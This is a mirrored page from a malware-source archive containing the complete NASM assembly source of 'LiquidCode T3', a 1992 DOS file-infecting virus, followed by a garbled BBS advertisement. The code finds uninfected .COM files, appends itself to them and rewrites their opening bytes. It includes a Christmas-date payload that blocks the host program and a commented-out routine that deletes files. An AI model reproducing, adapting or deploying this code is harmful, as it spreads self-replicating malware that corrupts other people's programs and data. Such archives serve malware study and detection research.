mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
362 lines
5.5 KiB
NASM
362 lines
5.5 KiB
NASM
|
;LiquidCode --- T3
|
|||
|
;
|
|||
|
; Virus
|
|||
|
;This version:
|
|||
|
;Searches current directory for non-infected com files, if any found
|
|||
|
;it will become infected!
|
|||
|
;This virus has a routine which self-destructs itself and uninfects
|
|||
|
;the file.
|
|||
|
assume cs:code
|
|||
|
.286
|
|||
|
code segment "code"
|
|||
|
org 0100h
|
|||
|
start proc
|
|||
|
jmp v_start ;first 5 bytes |
|
|||
|
nop ; |
|
|||
|
nop ; |
|
|||
|
v_start:
|
|||
|
call $+3 ;Actual virus
|
|||
|
pop dx
|
|||
|
sub dx, 3
|
|||
|
push dx ;save relocation factor in BP
|
|||
|
pop bp ;so virus can be copied anywhere twoards
|
|||
|
mov si, dx ;the end of the file
|
|||
|
;
|
|||
|
; Replace first 5 bytes in memory with original
|
|||
|
; program code so normal program can run later
|
|||
|
add si, first_five
|
|||
|
mov di, 0100h
|
|||
|
mov cx, 5
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
loop $-2
|
|||
|
;see if user want to disinfect this file
|
|||
|
; mov si, 82h
|
|||
|
; lodsb
|
|||
|
; cmp al, "[" ;is al the code to disinfect? "["
|
|||
|
; jne ok_dont_disinfect
|
|||
|
; jmp self_kill
|
|||
|
ok_dont_disinfect:
|
|||
|
;here should be date checks to see
|
|||
|
;if an evil function should be unleashed!!
|
|||
|
mov ah, 2ah
|
|||
|
int 21h
|
|||
|
;cx year 1980-2099
|
|||
|
;dh month 1-12
|
|||
|
;dl day
|
|||
|
;al day of week 0=sun 1=mon -> 7=sat
|
|||
|
cmp dh, 12
|
|||
|
jne notdec
|
|||
|
cmp dl, 25
|
|||
|
jne notdec
|
|||
|
jmp christmas
|
|||
|
notdec:
|
|||
|
cmp dh, 4
|
|||
|
jne notapril
|
|||
|
cmp dl, 1
|
|||
|
jne notapril
|
|||
|
; jmp aprilfools
|
|||
|
notapril:
|
|||
|
|
|||
|
;Set the DTA
|
|||
|
call set_dta
|
|||
|
;find first file to ?infect?
|
|||
|
call find_first_file
|
|||
|
go_again:
|
|||
|
mov si, bp
|
|||
|
add si, size_
|
|||
|
lodsw
|
|||
|
cmp ax, 5
|
|||
|
ja gd4
|
|||
|
jmp resrch
|
|||
|
gd4:
|
|||
|
call open_file
|
|||
|
mov bx, ax
|
|||
|
mov al, 0
|
|||
|
call date_time
|
|||
|
mov ah, 3fh
|
|||
|
mov cx, 5
|
|||
|
mov dx, bp
|
|||
|
add dx, first_five
|
|||
|
int 21h
|
|||
|
;**** mov ax, 4202h
|
|||
|
mov cx, 0
|
|||
|
mov ax, 4202h
|
|||
|
mov dx, cx
|
|||
|
int 21h
|
|||
|
sub ax, 3
|
|||
|
mov si, bp
|
|||
|
add si, new_5
|
|||
|
mov [si+1], ax
|
|||
|
mov si, bp
|
|||
|
mov di, si
|
|||
|
add si, chkmark
|
|||
|
add di, mark
|
|||
|
mov cx, 2
|
|||
|
repe cmpsb
|
|||
|
jne INFECT
|
|||
|
;File found was previously infected!
|
|||
|
; search for new one now.
|
|||
|
jmp resrch
|
|||
|
|
|||
|
wipe_name:
|
|||
|
push di
|
|||
|
push ax
|
|||
|
push cx
|
|||
|
mov di, bp
|
|||
|
add di, name_
|
|||
|
mov cx, 13
|
|||
|
mov al, 0
|
|||
|
rep stosb
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
pop di
|
|||
|
ret
|
|||
|
resrch:
|
|||
|
call wipe_name
|
|||
|
mov ah, 4fh
|
|||
|
int 21h
|
|||
|
jnc gd3
|
|||
|
jmp term_virus
|
|||
|
gd3:
|
|||
|
jmp go_again
|
|||
|
INFECT:
|
|||
|
;Time to infect the file!!
|
|||
|
mov si, bp
|
|||
|
add si, handle
|
|||
|
mov bx, [si]
|
|||
|
mov cx, vsize
|
|||
|
mov dx, bp
|
|||
|
call wipe_name
|
|||
|
mov ax, 4000h
|
|||
|
int 21h
|
|||
|
mov ax, 4200h
|
|||
|
mov cx, 0
|
|||
|
mov dx, cx
|
|||
|
int 21h
|
|||
|
mov dx, bp
|
|||
|
add dx, new_5
|
|||
|
mov ax, 4000h
|
|||
|
mov cx, 5
|
|||
|
int 21h
|
|||
|
mov al, 1
|
|||
|
call date_time
|
|||
|
mov ax, 3e00h
|
|||
|
int 21h
|
|||
|
jmp resrch
|
|||
|
|
|||
|
fndnam proc
|
|||
|
mov si, env
|
|||
|
mov ax, [si]
|
|||
|
mov es, ax
|
|||
|
mov ds, ax
|
|||
|
mov si, 0
|
|||
|
mov di, si
|
|||
|
__lp:
|
|||
|
lodsb
|
|||
|
cmp al, 0
|
|||
|
je chknxt
|
|||
|
stosb
|
|||
|
jmp __lp
|
|||
|
chknxt:
|
|||
|
stosb
|
|||
|
lodsb
|
|||
|
cmp al, 0
|
|||
|
je fnd1
|
|||
|
stosb
|
|||
|
jmp __lp
|
|||
|
fnd1:
|
|||
|
stosb
|
|||
|
__lp2:
|
|||
|
lodsb
|
|||
|
cmp al, "a"
|
|||
|
jae ff_
|
|||
|
up2:
|
|||
|
cmp al, "A"
|
|||
|
jae fff_
|
|||
|
up3:
|
|||
|
stosb
|
|||
|
jmp __lp2
|
|||
|
ff_:
|
|||
|
cmp al,"z"
|
|||
|
jbe fnd
|
|||
|
jmp up2
|
|||
|
fff_:
|
|||
|
cmp al, "Z"
|
|||
|
jbe fnd
|
|||
|
jmp up3
|
|||
|
fnd:
|
|||
|
mov si, di
|
|||
|
mov al, 0
|
|||
|
repne scasb
|
|||
|
mov dx, si
|
|||
|
mov di, dx
|
|||
|
ret
|
|||
|
env equ 2ch
|
|||
|
fndnam endp
|
|||
|
|
|||
|
|
|||
|
self_kill:
|
|||
|
;this procedure disinfects specified files
|
|||
|
;SI points to the name of current file on disk
|
|||
|
;which is infected
|
|||
|
call fndnam ;find name of current file from env block in memory
|
|||
|
jmp gd__
|
|||
|
abrt:
|
|||
|
int 20h
|
|||
|
gd__:
|
|||
|
mov ax, 3d02h
|
|||
|
int 21h
|
|||
|
jc abrt
|
|||
|
mov bx, ax
|
|||
|
mov ax, cs
|
|||
|
mov ds, ax
|
|||
|
mov es, ax
|
|||
|
mov cx, 5
|
|||
|
mov dx, bp
|
|||
|
add dx, first_five
|
|||
|
call wipe_name
|
|||
|
mov ax, 4000h
|
|||
|
int 21h
|
|||
|
jc abrt
|
|||
|
mov dx, 0
|
|||
|
mov cx, 0
|
|||
|
mov ax, 4202h
|
|||
|
int 21h
|
|||
|
jnc gd__1
|
|||
|
jmp abrt
|
|||
|
gd__1:
|
|||
|
sub ax, vsize
|
|||
|
mov dx, ax
|
|||
|
mov cx, 0
|
|||
|
mov ax, 4200h
|
|||
|
int 21h
|
|||
|
call wipe_name
|
|||
|
mov cx, 0
|
|||
|
mov ax, 4000h
|
|||
|
int 21h
|
|||
|
mov ax, 3e00h
|
|||
|
int 21h
|
|||
|
jmp term_virus
|
|||
|
date_time:
|
|||
|
pusha
|
|||
|
mov ah, 57h
|
|||
|
cmp al, 0
|
|||
|
je fnd__$
|
|||
|
mov di, bp
|
|||
|
mov si, di
|
|||
|
add di, date
|
|||
|
add si, time
|
|||
|
mov dx, [di]
|
|||
|
mov cx, [si]
|
|||
|
int 21h
|
|||
|
jmp ret__
|
|||
|
fnd__$:
|
|||
|
int 21h
|
|||
|
mov si, bp
|
|||
|
mov di, bp
|
|||
|
add si, time
|
|||
|
add di, date
|
|||
|
mov [si], cx
|
|||
|
mov [di], dx
|
|||
|
ret__:
|
|||
|
popa
|
|||
|
ret
|
|||
|
open_file:
|
|||
|
mov dx, bp
|
|||
|
add dx, name_
|
|||
|
mov ax, 3d02h
|
|||
|
int 21h
|
|||
|
jnc gd2
|
|||
|
jmp term_virus
|
|||
|
gd2:
|
|||
|
mov si, bp
|
|||
|
add si, handle
|
|||
|
mov [si], ax
|
|||
|
ret
|
|||
|
find_first_file:
|
|||
|
mov dx, bp
|
|||
|
mov cx, 0
|
|||
|
mov ah, 4eh
|
|||
|
add dx, all_com_files
|
|||
|
int 21h
|
|||
|
jnc gd1
|
|||
|
jmp term_virus
|
|||
|
gd1:
|
|||
|
ret
|
|||
|
set_dta:
|
|||
|
mov dx, bp
|
|||
|
mov ah, 1ah
|
|||
|
add dx, dta
|
|||
|
int 21h
|
|||
|
ret
|
|||
|
term_virus:
|
|||
|
mov ax, 0
|
|||
|
mov bx, ax
|
|||
|
mov cx, bx
|
|||
|
mov dx, cx
|
|||
|
mov si, 0100h
|
|||
|
mov di, -1
|
|||
|
mov bp, di
|
|||
|
push 0100h
|
|||
|
ret
|
|||
|
|
|||
|
CHRISTMAS:
|
|||
|
;Program Lockup
|
|||
|
; Exit without running program
|
|||
|
int 20h
|
|||
|
;APRILFOOLS:
|
|||
|
;Ha Ha delete current file
|
|||
|
; call fndnam
|
|||
|
; mov ah, 41h
|
|||
|
; int 21h
|
|||
|
; mov ax, cs
|
|||
|
; mov ds, ax
|
|||
|
; mov es, ax
|
|||
|
; jmp term_virus
|
|||
|
; Data Bank
|
|||
|
_fstfive:
|
|||
|
int 20h
|
|||
|
nop
|
|||
|
ckmrk:
|
|||
|
nop
|
|||
|
nop
|
|||
|
acf db "*.COM",0
|
|||
|
dt_ dw 0
|
|||
|
tme dw 0
|
|||
|
d_t_a:
|
|||
|
rfd db 21 dup (0)
|
|||
|
att db 0
|
|||
|
dw 0
|
|||
|
dw 0
|
|||
|
sz dd 0
|
|||
|
n_me db 13 dup (0),0
|
|||
|
handl dw 0
|
|||
|
nw_5 db 0e9h,0,0
|
|||
|
mrk db "<T3> "
|
|||
|
strain db "<tm>LiquidCode 92"
|
|||
|
;
|
|||
|
end___:
|
|||
|
first_five = offset _fstfive-0105h
|
|||
|
all_com_files = offset acf-0105h
|
|||
|
dta = offset d_t_a-0105h
|
|||
|
attribute = offset att-0105h
|
|||
|
time = offset tme-0105h
|
|||
|
date = offset dt_-0105h
|
|||
|
size_ = offset sz-0105h
|
|||
|
name_ = offset n_me-0105h
|
|||
|
handle = offset handl-0105h
|
|||
|
new_5 = offset nw_5-0105h
|
|||
|
mark = offset mrk-0105h
|
|||
|
chkmark = offset ckmrk-0105h
|
|||
|
vsize = offset end___-0105h
|
|||
|
start endp
|
|||
|
code ends
|
|||
|
end start
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|